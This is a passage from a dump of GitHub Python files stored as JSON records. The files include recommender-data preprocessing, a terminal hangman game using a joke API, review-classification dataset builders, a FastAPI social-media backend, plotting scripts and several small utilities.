Bubblesort.py","file_ext":"py","file_size_in_byte":10984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14482322781","text":"import pickle\nfrom tqdm import tqdm\nimport numpy as np\n\n'''\n# 1.Label Encoding for sparse features,and process sequence features\n for feat in feature_names['sparse']:\n lbe = LabelEncoder()\n full_data[feat] = lbe.fit_transform(full_data[feat])\n hist_feat = 'hist_' + feat\n if hist_feat in feature_names['vallen']:\n for i, hist_list in enumerate(tqdm(full_data[hist_feat],\n total=len(full_data[hist_feat]),\n desc='labeling '+hist_feat)):\n try:\n zero_index = hist_list.index(0)\n except ValueError:\n zero_index = len(hist_list)\n true_hist_list = lbe.transform(hist_list[:zero_index])\n full_data[hist_feat][i] = list(true_hist_list) + hist_list[zero_index:]\n'''\n\ndef process_amazon(max_his_length=20, sub_name='Beauty'):\n DIR = 'Amazon/' + sub_name + '/'\n try:\n data = pickle.load(open('processed_Amazon' + sub_name + '.pkl', 'rb'))\n except:\n uid_voc = pickle.load(open(DIR + 'uid_voc.pkl', 'rb'))\n mid_voc = pickle.load(open(DIR + 'mid_voc.pkl', 'rb'))\n cat_voc = pickle.load(open(DIR + 'cat_voc.pkl', 'rb'))\n source_dicts = []\n for source_dict in [uid_voc, mid_voc, cat_voc]:\n source_dicts.append(source_dict)\n\n feature_names = ['uid', 'mid', 'cat', 'hist_mid', 'hist_cat', 'seq_length']\n # feature_names += ['item_bhvs_uid_feats', 'item_bhvs_id_feats', 'item_bhvs_cat_feats']\n\n data = {}\n total_num = sum([1 for _ in open(DIR + 'local_all_sample_sorted_by_time', 'r')])\n with open(DIR + 'local_all_sample_sorted_by_time', 'r') as f_samp:\n for line in tqdm(f_samp, total=total_num, desc='reading local_all_sample_sorted_by_time'):\n ss = line.strip('\\n').split('\\t')\n uid = source_dicts[0][ss[1]] if ss[1] in source_dicts[0] else 0\n mid = source_dicts[1][ss[2]] if ss[2] in source_dicts[1] else 0\n cat = source_dicts[2][ss[3]] if ss[3] in source_dicts[2] else 0\n\n tmp = []\n for fea in ss[4].split(\"|\"):\n m = source_dicts[1][fea] if fea in source_dicts[1] else 0\n tmp.append(m)\n seq_length = len(tmp)\n tmp += [0 for _ in range(max_his_length - len(tmp))]\n hist_mid = tmp\n\n tmp1 = []\n for fea in ss[5].split(\"|\"):\n c = source_dicts[2][fea] if fea in source_dicts[2] else 0\n tmp1.append(c)\n tmp1 += [0 for _ in range(max_his_length - len(tmp1))]\n hist_cat = tmp1\n\n for feature in feature_names:\n if feature in data.keys():\n data[feature].append(eval(feature))\n else:\n data[feature] = [eval(feature)]\n\n if 'target' in data.keys():\n data['target'].append(float(ss[0]))\n else:\n data['target'] = [float(ss[0])]\n\n sample_num = len(data['uid'])\n for feat in feature_names + ['target']:\n data[feat] = np.array(data[feat]).reshape(sample_num, -1)\n\n pickle.dump(data, open('processed_Amazon' + sub_name + '.pkl', 'wb'))\n\ndef process_movielens(max_his_length=20):\n DIR = 'MovieLens/'\n try:\n data = pickle.load(open('processed_MovieLens.pkl', 'rb'))\n except:\n # load genre ids\n genre_dict = {}\n with open(DIR + 'u.genre', 'r') as f:\n for line in f:\n name, id = line.strip().split('|')\n genre_dict[name] = id\n gender_map = {\n 'M': 1,\n 'F': 2,\n }\n zip_voc = pickle.load(open(DIR + 'zipcode_voc.pkl', 'rb'))\n\n feature_names = ['uid', 'mid', 'cat',\n 'hist_mid', 'hist_cat', 'seq_length',\n 'gender', 'age', 'occup', 'u_zip']\n data = {}\n total_num = sum([1 for line in open(DIR + 'all_sample_with_histinfo', 'r')])\n with open(DIR + 'all_sample_with_histinfo', 'r') as f_samp:\n for line in tqdm(f_samp, total=total_num, desc='reading all_sample_with_histinfo'):\n ss = line.strip('\\n').split('\\t')\n\n uid, mid = [int(i) for i in ss[1:3]]\n genre_name = ss[3].split('|')[0]\n cat = int(genre_dict[genre_name])\n gender = gender_map[ss[6]]\n age, occup = [int(i) for i in ss[7:-2]]\n zipcode = ss[-2]\n u_zip = zip_voc[zipcode] if zipcode in zip_voc.keys() else 0\n\n tmp_m = [int(i) for i in ss[4].split(';')]\n tmp_m += [0 for _ in range(max_his_length - len(tmp_m))]\n seq_length = len(tmp_m)\n hist_mid = tmp_m\n\n tmp_g = []\n for fea in ss[5].split(';'):\n str_list = fea.split('|')\n id_list = [genre_dict[i] for i in str_list]\n tmp_g.append(int(id_list[0]))\n tmp_g += [0 for _ in range(max_his_length - len(tmp_g))]\n hist_cat = tmp_g\n\n for feature in feature_names:\n if feature in data.keys():\n data[feature].append(eval(feature))\n else:\n data[feature] = [eval(feature)]\n\n if 'target' in data.keys():\n data['target'].append(float(ss[0]))\n else:\n data['target'] = [float(ss[0])]\n\n sample_num = len(data['uid'])\n for feat in feature_names + ['target']:\n data[feat] = np.array(data[feat]).reshape(sample_num, -1)\n\n pickle.dump(data, open('processed_MovieLens.pkl', \"wb\"))\n\nif __name__ == \"__main__\":\n #process_amazon(sub_name='Clothing_Shoes_and_Jewelry')\n process_movielens()","repo_name":"ChenXiang1998/AutoCTR","sub_path":"CTRAPI/data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":6144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37037335423","text":"import os\nimport re\nimport sys\nimport requests\n\n\n# game settings\nbody_dict = {}\nbody_dict[6] = (f'--|')\nbody_dict[5] = (f'{body_dict[6]}\\n O')\nbody_dict[4] = (f'{body_dict[5]}\\n /')\nbody_dict[3] = (f'{body_dict[4]}|')\nbody_dict[2] = (f'{body_dict[3]}\\\\')\nbody_dict[1] = (f'{body_dict[2]}\\n /')\nbody_dict[0] = (f'{body_dict[1]} \\\\')\nguessed_letters = []\nwrong_letters = []\njoke_requests_remaining = 3\n# joke = 'What does an angry pepper do?'\n# punchline = 'It gets jalopeno face.'\n\n\ndef get_joke():\n headers = {'accept': 'application/json'}\n for _ in range(joke_requests_remaining):\n response = requests.get('https://icanhazdadjoke.com/', headers=headers)\n data = response.json()\n text = data['joke']\n # restrict joke format from API response to two part joke\n joke_match = re.search(r'(.+[.?!])(.+[.?!])', text)\n if joke_match:\n joke = joke_match.group(1).strip()\n punchline = joke_match.group(2).strip()\n return joke, punchline\n # discard joke if there is no distinct punchline\n print(\n f'Did not get a good joke. {joke_requests_remaining} tries left.')\n sys.exit(1)\n\n\ndef update_blanks(punchline):\n display = []\n for char in punchline.lower():\n if not char.isalpha() or char in guessed_letters:\n display.append(char)\n else:\n display.append('_')\n display[0] = display[0].upper()\n return ' '.join(display)\n\n\ndef main():\n num_of_chances_remaining = 6\n joke = get_joke()\n text, punchline = joke\n\n while True:\n os.system('cls' if os.name == 'nt' else 'clear')\n print(f'\\n{text}\\n')\n gameboard = update_blanks(punchline)\n if '_' not in gameboard:\n print(punchline)\n print(f'\\nNice Job! Laugh Away!!\\n')\n break\n print(gameboard)\n print(f'\\nNumber of guesses remaining...{num_of_chances_remaining}\\n')\n print(body_dict[num_of_chances_remaining])\n print(f\"\\nIncorrect guesses: {' '.join(wrong_letters)}\")\n guess = input(\"Guess a letter: \").lower()\n if guess not in punchline.lower():\n wrong_letters.append(guess)\n if guess not in guessed_letters:\n num_of_chances_remaining -= 1\n if guess not in guessed_letters:\n guessed_letters.append(guess)\n if not num_of_chances_remaining:\n os.system('cls' if os.name == 'nt' else 'clear')\n print(body_dict[num_of_chances_remaining])\n print(f'\\nClose but no cigar\\n')\n break\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hmcollard/hangman","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9445063751","text":"import math\nfrom collections import defaultdict\n\nimport json\nimport numpy as np\nimport random\nfrom gensim.models.deprecated.fasttext_wrapper import FastText\nfrom tqdm import tqdm\nfrom nltk import sent_tokenize\nfrom cat_config import get_cats\nfrom max_sim import calc_similarity\nimport os\nimport pandas as pd\n\nLAPTOPS_DOMAIN_NAME = 'laptops'\nREST_DOMAIN_NAME = 'rest'\nHOTEL_DOMAIN_NAME = 'hotel'\nDEVICES_DOMAIN_NAME = 'devices'\nBOOKS_DOMAIN_NAME = 'books'\ndomains = [LAPTOPS_DOMAIN_NAME, REST_DOMAIN_NAME]\ncats = {d: get_cats(d) for d in domains}\n\n\ndef get_max_cat_similarity(token_text, domain_categories, model):\n max_similarity = -1\n max_cat = None\n for domain_cat in domain_categories:\n similarity = calc_similarity(token_text, domain_cat, model)\n if similarity is not None and similarity[0][0] > max_similarity:\n max_similarity = similarity[0][0].item()\n max_cat = domain_cat\n return max_similarity, max_cat\n\n\ndef create_dataset(reviews_path, domain, dataset_output_path, embedding_model_path='embeddings/cc.en.300', config={}):\n print(f'Creating the dataset cache for the CPP task for {domain}')\n if os.path.exists(dataset_output_path):\n return json.load(open(dataset_output_path, 'r+'))\n print(dataset_output_path)\n embedding_model = FastText.load_fasttext_format(embedding_model_path)\n with open(reviews_path, 'r') as reviews_fp:\n reviews = reviews_fp.readlines()\n reviews_res = []\n sampled_reviews = [y for x in random.sample(reviews, min(10000, len(reviews))) for y in sent_tokenize(x)]\n saved_res = defaultdict(dict)\n for review in tqdm(sampled_reviews):\n review_res = {}\n for cat in cats[domain]:\n review_res[cat] = {}\n for token in review.split():\n if saved_res.get(cat,{}).get(token, None) is None:\n similarity = calc_similarity(token, cat, embedding_model)\n else:\n similarity = saved_res.get(cat).get(token, None)\n\n review_res[cat][token] = str(similarity[0][0]) if similarity is not None else str(-1)\n saved_res[cat][token] = review_res[cat][token]\n reviews_res.append((review_res, review))\n json.dump(reviews_res, open(dataset_output_path, 'w+'))\n return reviews_res\n\n\ndef create_classification_dataset_for_threshold(reviews_to_similarities, domains, thresholds,\n num_of_samples, seed=1):\n output_filename = f'{\"_\".join(domains)}_{\"_\".join([str(t) for t in thresholds])}_num_of_samples_{num_of_samples}.csv'\n if os.path.exists(output_filename):\n return output_filename\n res_dic = defaultdict(list)\n random.seed(seed)\n for domain, threshold in zip(domains, thresholds):\n for similarities, review in random.sample(reviews_to_similarities[domain], num_of_samples):\n res_dic['text'].append(review)\n for cat in cats[domain]:\n res_dic[f'{domain}_{cat}'].append(any(float(x) > threshold for x in similarities[cat].values()))\n for other_domain in [d for d in domains if d != domain]:\n for cat in cats[other_domain]:\n res_dic[f'{other_domain}_{cat}'].append(False)\n df = pd.DataFrame(data=res_dic)\n df.to_csv(output_filename)\n return output_filename\n\n\ndef create_classification_dataset_dynamic(reviews_to_similarities, domain1, domain2, percent_of_categories,\n num_of_samples):\n output_filename = f'classification_datasets/cats%_{percent_of_categories}_num_of_samples_{num_of_samples}_{domain1}_{domain2}.csv'\n if os.path.exists(output_filename):\n return\n res_dic = defaultdict(list)\n random.seed(1)\n for similarities, review in random.sample(reviews_to_similarities[domain1], num_of_samples):\n res_dic['text'].append(review)\n cat_for_review = {}\n for cat in cats[domain1]:\n cat_for_review[cat] = max([float(x) for x in similarities[cat].values()])\n percentile = np.percentile(list(cat_for_review.values()), 100 - (percent_of_categories * 100))\n for cat in cats[domain1]:\n res_dic[f'{domain1}_{cat}'].append(any(float(x) > percentile for x in similarities[cat].values()))\n for cat in cats[domain2]:\n res_dic[f'{domain2}_{cat}'].append(False)\n random.seed(1)\n for similarities, review in random.sample(reviews_to_similarities[domain2], num_of_samples):\n res_dic['text'].append(review)\n cat_for_review = {}\n for cat in cats[domain2]:\n cat_for_review[cat] = max([float(x) for x in similarities[cat].values()])\n percentile = np.percentile(list(cat_for_review.values()), 100 - (percent_of_categories * 100))\n for cat in cats[domain2]:\n res_dic[f'{domain2}_{cat}'].append(any(float(x) > percentile for x in similarities[cat].values()))\n for cat in cats[domain1]:\n res_dic[f'{domain1}_{cat}'].append(False)\n df = pd.DataFrame(data=res_dic)\n df.to_csv(output_filename)\n\n\ndef create_classification_sum_tokens(reviews_to_similarities, domains, alphas,\n num_of_samples, seed):\n output_filename = f'classification_datasets/numeric_{seed}_{\"_\".join(domains)}_{\"_\".join([str(t) for t in alphas])}_samples_{num_of_samples}.csv'\n if os.path.exists(output_filename):\n return output_filename\n res_df = create_domain_df(domains, alphas, num_of_samples, reviews_to_similarities, seed)\n res_df = res_df[['text'] + sorted([c for c in res_df.columns if c != 'text'])]\n\n res_df.to_csv(output_filename)\n return output_filename\n\n\ndef create_domain_df(domains, alphas, num_of_samples, reviews_to_similarities, seed):\n res_dic = defaultdict(list)\n random.seed(seed)\n for domain, alpha in zip(domains, alphas):\n for similarities, review in random.sample(reviews_to_similarities[domain], num_of_samples):\n res_dic['text'].append(review)\n cat_for_review = {}\n for cat in cats[domain]:\n cat_for_review[cat] = sum([float(x) for x in similarities[cat].values()])\n num_of_categories_1 = round(alpha * len(review.split()))\n max_cats = [x[0] for x in\n sorted(cat_for_review.items(), key=lambda x: x[1], reverse=True)[:num_of_categories_1]]\n for cat in cats[domain]:\n if cat in max_cats:\n res_dic[f'{domain}_{cat}'].append(True)\n else:\n res_dic[f'{domain}_{cat}'].append(False)\n for other_domain in [d for d in domains if d != domain]:\n for cat in cats[other_domain]:\n res_dic[f'{other_domain}_{cat}'].append(False)\n df = pd.DataFrame(data=res_dic)\n return df\n\n\ndef create_classification_num_of_top_categories(reviews_to_similarities, domains, num_top_categories,\n num_of_samples, seed):\n output_filename = f'classification_datasets/num_cat_{seed}_{\"_\".join(domains)}_{\"_\".join([str(t) for t in num_top_categories])}_samples_{num_of_samples}.csv'\n if os.path.exists(output_filename):\n return output_filename\n res_dic = defaultdict(list)\n random.seed(seed)\n for domain, num_cat in zip(domains, num_top_categories):\n for similarities, review in random.sample(reviews_to_similarities[domain], num_of_samples):\n res_dic['text'].append(review)\n cat_for_review = {}\n for cat in cats[domain]:\n cat_for_review[cat] = sum([float(x) for x in similarities[cat].values()])\n max_cats = [x[0] for x in\n sorted(cat_for_review.items(), key=lambda x: x[1], reverse=True)[:num_cat]]\n for cat in cats[domain]:\n if cat in max_cats:\n res_dic[f'{domain}_{cat}'].append(True)\n else:\n res_dic[f'{domain}_{cat}'].append(False)\n for other_domain in [d for d in domains if d != domain]:\n for cat in cats[other_domain]:\n res_dic[f'{other_domain}_{cat}'].append(False)\n df = pd.DataFrame(data=res_dic)\n df = df[['text'] + sorted([c for c in df.columns if c != 'text'])]\n\n df.to_csv(output_filename)\n return output_filename\n\n\n# thresholds = np.arange(0.31, 0.41, 0.02)\nlist_of_num_of_samples = [1000]\n# thresholds1 = [0.32, 0.31, 0.32, 0.31, 0.315, 0.3, 0.315, 0.31]\n# thresholds2 = [0.32, 0.32, 0.31, 0.31, 0.315, 0.3, 0.31, 0.315]\n# for threshold1, threshold2 in tqdm(zip(thresholds1, thresholds2), desc='Thresholds'):\n# for num_of_samples in tqdm(list_of_num_of_samples, desc='Num of samples'):\n# create_classification_dataset_for_threshold(reviews_to_similarities,\n# REST_DOMAIN_NAME,\n# HOTEL_DOMAIN_NAME,\n# threshold1, threshold2,\n# num_of_samples)\n# list_of_percent_of_categories = [0.1] # [0.05, 0.1, 0.15, 0.2]\n# for percent_of_categories in tqdm(list_of_percent_of_categories, desc='Percent of cats'):\n# for num_of_samples in tqdm(list_of_num_of_samples, desc='Num of samples'):\n# create_classification_dataset_dynamic(reviews_to_similarities, REST_DOMAIN_NAME, HOTEL_DOMAIN_NAME,\n# percent_of_categories,\n# num_of_samples)\nif __name__ == '__main__':\n num_of_categories = [(1, 1), (2, 1), (2, 2)] # [0.05, 0.1, 0.15, 0.2]\n alphas = [\n (0.03, 0.03),\n (0.04, 0.04),\n (0.05, 0.05)\n # (0.04, 0.04),\n # (0.05, 0.05), (0.05, 0.06), (0.06, 0.05), (0.06, 0.06), (0.04, 0.04), (0.03, 0.04), (0.04, 0.03),\n # (0.05, 0.04),\n # (0.04, 0.05), (0.03, 0.03)\n ]\n\n dfs = []\n for alpha in tqdm(alphas, desc='Percent of cats'):\n for num_of_samples in tqdm(list_of_num_of_samples, desc='Num of samples'):\n res = create_classification_sum_tokens(reviews_to_similarities, LAPTOPS_DOMAIN_NAME,\n REST_DOMAIN_NAME,\n alpha[0], alpha[1],\n num_of_samples, 2)\n dfs.append(res)\n print(dfs)\n","repo_name":"tonylekhtman/DILBERT","sub_path":"classification_data_creation.py","file_name":"classification_data_creation.py","file_ext":"py","file_size_in_byte":10502,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"71702681654","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\nimport json\nimport logging\nimport os\nfrom contextlib import contextmanager\nfrom pathlib import Path\nfrom typing import (\n Any,\n Callable,\n Dict,\n Iterable,\n Iterator,\n List,\n MutableMapping,\n NamedTuple,\n Tuple,\n TypeVar,\n cast,\n)\n\nimport toml\n\nfrom .plugins import Cache, FileManager, Parallel, TmpdirManager\nfrom .remotes import Remote\nfrom .rules import Rule\nfrom .sessions import Session\nfrom .tasks import Task\nfrom .utils import Pathable, get_timestamp\n\n__all__ = ()\n\nlog = logging.getLogger(__name__)\n\n_R = TypeVar('_R', bound=Rule[object])\nArgFactory = Callable[[str], object]\n\n\nclass Entry(NamedTuple):\n rule: Rule[object]\n factories: Tuple[ArgFactory, ...]\n stdout: bool\n\n\nclass Mona:\n MONADIR = '.mona'\n TMPDIR = 'tmpdir'\n FILES = 'files'\n CACHE = 'cache.db'\n LAST_ENTRY = 'LAST_ENTRY'\n\n def __init__(self, monadir: Pathable = None) -> None:\n monadir = monadir or os.environ.get('MONA_DIR') or Mona.MONADIR\n self._monadir = Path(monadir).resolve()\n self._configfile = self._monadir / 'config.toml'\n self._config: Dict[str, Any] = {}\n self._entries: Dict[str, Entry] = {}\n for path in [\n Path('~/.config/mona/config.toml').expanduser(),\n Path('mona.toml'),\n self._configfile,\n ]:\n if path.exists():\n with path.open() as f:\n self._config.update(toml.load(f))\n\n def entry(\n self, name: str, *factories: ArgFactory, stdout: bool = False\n ) -> Callable[[_R], _R]:\n def decorator(rule: _R) -> _R:\n self._entries[name] = Entry(rule, factories, stdout)\n return rule\n\n return decorator\n\n def get_entry(self, name: str) -> Entry:\n return self._entries[name]\n\n def call_entry(self, name: str, *arg_strings: str) -> Task[object]:\n rule, factories, _ = self._entries[name]\n args = [factory(arg_str) for factory, arg_str in zip(factories, arg_strings)]\n return rule(*args)\n\n def create_session(self, warn: bool = False, **kwargs: Any) -> Session:\n sess = Session(warn=warn)\n self(sess, **kwargs)\n return sess\n\n @property\n def last_entry(self) -> List[str]:\n return cast(\n List[str], json.loads((self._monadir / Mona.LAST_ENTRY).read_text())\n )\n\n @last_entry.setter\n def last_entry(self, entry: List[str]) -> None:\n (self._monadir / Mona.LAST_ENTRY).write_text(json.dumps(entry))\n\n def call_last_entry(self) -> Task[object]:\n return self.call_entry(*self.last_entry)\n\n def __call__(\n self,\n sess: Session,\n ncores: int = None,\n write: str = 'eager',\n full_restore: bool = False,\n ) -> None:\n self._plugins = {\n 'parallel': Parallel(ncores),\n 'tmpdir': TmpdirManager(self._monadir / Mona.TMPDIR),\n 'files': FileManager(self._monadir / Mona.FILES),\n 'cache': Cache.from_path(\n self._monadir / Mona.CACHE, write=write, full_restore=full_restore\n ),\n }\n for plugin in self._plugins.values():\n plugin(sess)\n\n def ensure_initialized(self) -> None:\n if self._monadir.is_dir():\n log.info(f'Already initialized in {self._monadir}.')\n return\n log.info(f'Initializing an empty repository in {self._monadir}.')\n self._monadir.mkdir()\n try:\n cache_home = Path(self._config['cache'])\n except KeyError:\n for dirname in [Mona.TMPDIR, Mona.FILES]:\n (self._monadir / dirname).mkdir()\n else:\n ts = get_timestamp()\n cachedir = cache_home / f'{Path.cwd().name}_{ts}'\n cachedir.mkdir()\n for dirname in [Mona.TMPDIR, Mona.FILES]:\n (cachedir / dirname).mkdir()\n (self._monadir / dirname).symlink_to(cachedir / dirname)\n\n @contextmanager\n def update_config(self) -> Iterator[MutableMapping[str, Any]]:\n if self._configfile.exists():\n with self._configfile.open() as f:\n config = toml.load(f)\n else:\n config = {}\n yield config\n self._config.update(config)\n if config:\n with self._configfile.open('w') as f:\n toml.dump(config, f)\n\n def parse_remotes(self, remote_str: str) -> Iterable[Remote]:\n if remote_str == 'all':\n remotes = list(self._config['remotes'].values())\n else:\n remotes = [self._config['remotes'][name] for name in remote_str.split(',')]\n for remote in remotes:\n yield Remote(remote['host'], remote['path'])\n","repo_name":"jhrmnn/mona","sub_path":"src/mona/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"41215214776","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nplt.rcParams['axes.linewidth'] = 2\nplt.rcParams['xtick.major.size']=8\nplt.rcParams['ytick.major.size']=8\nplt.rcParams['xtick.major.width']=2\nplt.rcParams['ytick.major.width']=2\nplt.rcParams['xtick.direction']='in'\nplt.rcParams['ytick.direction']='in'\n\nData = np.loadtxt('LocalDensityMatrix.dat')\nvmax=Data.max()\nfig = plt.figure()\nax = fig.add_subplot(111)\ncaxes=ax.matshow(Data,cmap=plt.cm.bwr,vmin=-vmax,vmax=vmax)\nax.set_xlabel('Site',fontsize=16)\nax.set_ylabel('Site',fontsize=16)\nax.xaxis.set_ticks_position('bottom')\nfig.colorbar(caxes)\nplt.savefig('LocalDensityMatrix.png',dpi=400)\nplt.show()\n\nData = np.loadtxt('SpectralDensityMatrix.dat')\nvmax=Data.max()\nfig = plt.figure()\nax = fig.add_subplot(111)\ncaxes=ax.matshow(Data,cmap=plt.cm.bwr,vmin=-vmax,vmax=vmax)\nax.set_xlabel('Site',fontsize=16)\nax.set_ylabel('Site',fontsize=16)\nax.xaxis.set_ticks_position('bottom')\nfig.colorbar(caxes)\nplt.savefig('SpectralDensityMatrix.png',dpi=400)\nplt.show()\n\n","repo_name":"GHlacour/NISE_Tutorials","sub_path":"LH2/densityPlot.py","file_name":"densityPlot.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"69902270134","text":"import cv2\r\n\r\n\r\ndef find_start_end_nodes(img_path):\r\n image = cv2.imread(img_path)\r\n dims = image.shape\r\n\r\n width = dims[1]\r\n height = dims[0]\r\n pxlz = []\r\n\r\n for x in range(width):\r\n for y in range(height):\r\n px_val = image[y, x]\r\n pxlz.append(tuple(px_val))\r\n\r\n pixel_set = set(pxlz)\r\n non_bw_rgb = None\r\n for rgb in pixel_set:\r\n if rgb != (0, 0, 0) and rgb != (255, 255, 255):\r\n non_bw_rgb = rgb\r\n\r\n nodes = []\r\n for x in range(width):\r\n for y in range(height):\r\n px_val = image[y, x]\r\n if tuple(px_val) == non_bw_rgb:\r\n nodes.append((x, y))\r\n\r\n return nodes\r\n\r\n\r\n","repo_name":"joeholden/Breadth-First-Search_Image-Connectivity","sub_path":"find_start_end_targets.py","file_name":"find_start_end_targets.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38741662844","text":"import random\nimport torch\nimport pandas as pd\nfrom pathlib import Path\nimport torch.utils.data as data\nimport numpy as np\n\nclass WsiFeatDataset(data.Dataset):\n '''WsiFeatDataset\n Args:\n state (str): train or test stage\n data_dir (str): path to wsi feature data\n label_dir (str): path to label data\n nfolds (int): n-fold cross validation strategy. Default: 4\n fold (int): currently processing i-th fold. Value range: [0,n-1]\n data_shuffle (bool): shuffle strategy. Default: False\n '''\n def __init__(self, state=None, data_dir=None, label_dir=None, nfold=4, fold=0, data_shuffle=False, **kwargs):\n super(WsiFeatDataset, self).__init__()\n\n self.state = state\n self.nfolds = nfold\n self.fold = fold\n self.feature_dir = data_dir\n self.csv_dir = label_dir + f'fold{self.fold}.csv'\n self.slide_data = pd.read_csv(self.csv_dir, index_col=0)\n self.data_shuffle = data_shuffle\n\n # split dataset\n if state == 'train':\n self.data = self.slide_data.loc[:, 'train'].dropna()\n self.label = self.slide_data.loc[:, 'train_label'].dropna()\n if state == 'val':\n self.data = self.slide_data.loc[:, 'val'].dropna()\n self.label = self.slide_data.loc[:, 'val_label'].dropna()\n if state == 'test':\n self.data = self.slide_data.loc[:, 'test'].dropna()\n self.label = self.slide_data.loc[:, 'test_label'].dropna()\n \n def __len__(self):\n return len(self.data)\n\n # dataloader automatically call __getitem__()\n def __getitem__(self, idx):\n slide_id = self.data[idx]\n label = int(self.label[idx])\n full_path = Path(self.feature_dir) / f'{slide_id}.pt'\n features = torch.load(full_path)\n\n # shuffle\n if self.data_shuffle == True:\n index = [x for x in range(features.shape[0])]\n random.shuffle(index)\n features = features[index]\n\n return slide_id, features, label","repo_name":"RuixiangZhao/WSI_classification_baseline","sub_path":"datasets/wsi_feat_dataset.py","file_name":"wsi_feat_dataset.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19719884671","text":"def email_slicer(emails: list) -> None:\n for email in emails:\n if '@' in email:\n usr, domain = email.split('@')\n extension = domain.split('.')[1]\n print(f'Username: {usr}')\n print(f'Domain: {domain}')\n print(f'Extension: {extension}')\n\nemail_slicer(['john.doe@yahoo.com', 'jane.doe@hotmail.com','john.doe@proton.me'])\n","repo_name":"Exclob/Python-Beginner-Projects","sub_path":"email_slicer.py","file_name":"email_slicer.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33809071801","text":"from fastapi import FastAPI\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom config import settings\nfrom routes.user import router as UserRouter\nfrom routes.post import router as PostRouter\nfrom routes.comment import router as CommentRouter\nfrom routes.relationship import router as RelationshipRouter\nfrom routes.chat import router as ChatRouter\nfrom routes.room import router as RoomRouter\nfrom db.redis import redis_cache\n\napp = FastAPI()\n\norigins = [\n \"http://localhost:3000\",\n]\n\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"]\n)\n\n@app.on_event(\"startup\")\nasync def startup_db_client():\n await redis_cache.init_cache()\n # value = await redis_cache.keys('*')\n # await redis_cache.set(\"boss\", \"trungtin\")\n # messages = await redis_cache.xread(['test'], timeout=60000)\n # print(messages)\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown_db_client():\n await redis_cache.close()\n\n\n@app.get(\"/\", tags=[\"Root\"], response_class=HTMLResponse)\nasync def read_root() -> dict:\n return \"\"\"\n \n \n TinySM | FastAPI\n \n \n

Gotcha! Browse to /docs for details!

\n \n \n \"\"\"\n\napp.include_router(UserRouter, tags=[\"User\"], prefix=\"/auth\")\napp.include_router(PostRouter, tags=[\"Post\"], prefix=\"/post\")\napp.include_router(CommentRouter, tags=[\"Comment\"], prefix=\"/comment\")\napp.include_router(RelationshipRouter, tags=[\"Relationship\"], prefix=\"/relationship\")\napp.include_router(ChatRouter, tags=[\"Chat\"], prefix=\"/chat\")\napp.include_router(RoomRouter, tags=[\"Room\"], prefix=\"/room\")\n\n\n","repo_name":"freddieentity/fastapi-tinysm-neo4j-redis","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5623499107","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\nfrom reportlab.pdfgen import canvas\n\n\nclass Silla:\n def __init__(self, nombre):\n self.nombre = nombre\n\n brazo = 0\n rueda = 0\n piston = 0\n basculante = 0\n estrella = 0\n\n\n# Abre el excel de la ruta indicada y toma los datos de la columna\ndef obtenerdatoscolumna(ruta: str, columna: str):\n xls = pd.read_excel(ruta)\n info = xls[columna].values\n return info\n\n\n# Con los nombres indicados crea objetos\ndef crearobjetos(arrayNombres: list):\n newObjts = []\n for i in arrayNombres:\n silla = Silla(i.lower())\n newObjts.append(silla)\n return newObjts\n\n\n# Comprueba si la avería coincide con alguna pieza reparable y devuelve la palabra localizada\ndef esReparable(averia: str, palabrasClave: list):\n for palabra in palabrasClave:\n if palabra in averia:\n return palabra\n return None\n\n\n# Main\ndef encontrarMarca(marca: str, nombresComparar: list):\n for nombre in nombresComparar:\n if nombre.lower() in marca.lower():\n return nombre.lower()\n\n\ndef encontrarSilla(actualMarca: str, allSillas: list):\n for silla in allSillas:\n if actualMarca in silla.nombre:\n return silla\n\n\ndef crearPdf(allSillas: list, dataAverias: list, sillasSalvables: int):\n pdf = canvas.Canvas('Informe de Sillas.pdf')\n ejeX = 80\n ejeY = 750\n for final in allSillas:\n if not (final.piston == 0 and final.estrella == 0 and\n final.rueda == 0 and final.brazo == 0 and\n final.basculante == 0):\n if ejeY <= 75:\n ejeX = 100\n ejeY = 750\n pdf.showPage()\n pdf.drawString(ejeX, ejeY, 'Sobre la marca: ' + final.nombre.capitalize())\n ejeY = ejeY - 25\n pdf.drawString(ejeX, ejeY,\n 'Las siguientes piezas podrían haber sido sustituidas para evitar la llegada del artículo a')\n ejeY = ejeY - 25\n pdf.drawString(ejeX, ejeY, 'PcComponentes:')\n ejeY = ejeY - 25\n pdf.drawString(ejeX, ejeY, 'Estrellas: ' + 